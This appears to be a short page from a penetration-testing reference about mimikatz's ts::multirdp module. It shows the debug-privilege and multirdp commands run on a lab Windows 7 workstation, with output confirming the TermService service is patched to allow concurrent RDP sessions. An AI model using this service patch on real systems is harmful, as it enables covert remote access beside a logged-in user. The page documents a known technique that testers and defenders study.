multirdp
ts::multirdp
can be used to enable multiple RDP connections on the target server.
You do not need to patch the RDP service on Windows Servers since multiple RDP connections are allowed,
There are two local administrator users:
m3g9tr0n
(Local Administrator)hacklab.local\m3g9tr0n
(Domain user part of the local administrators group)
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # ts::multirdp
"TermService" service patched
As a result, it is possible to initiate another RDP connection while the other user is already connected.
(Demonstration target is a Windows 7, domain joined, workstation.)
Last updated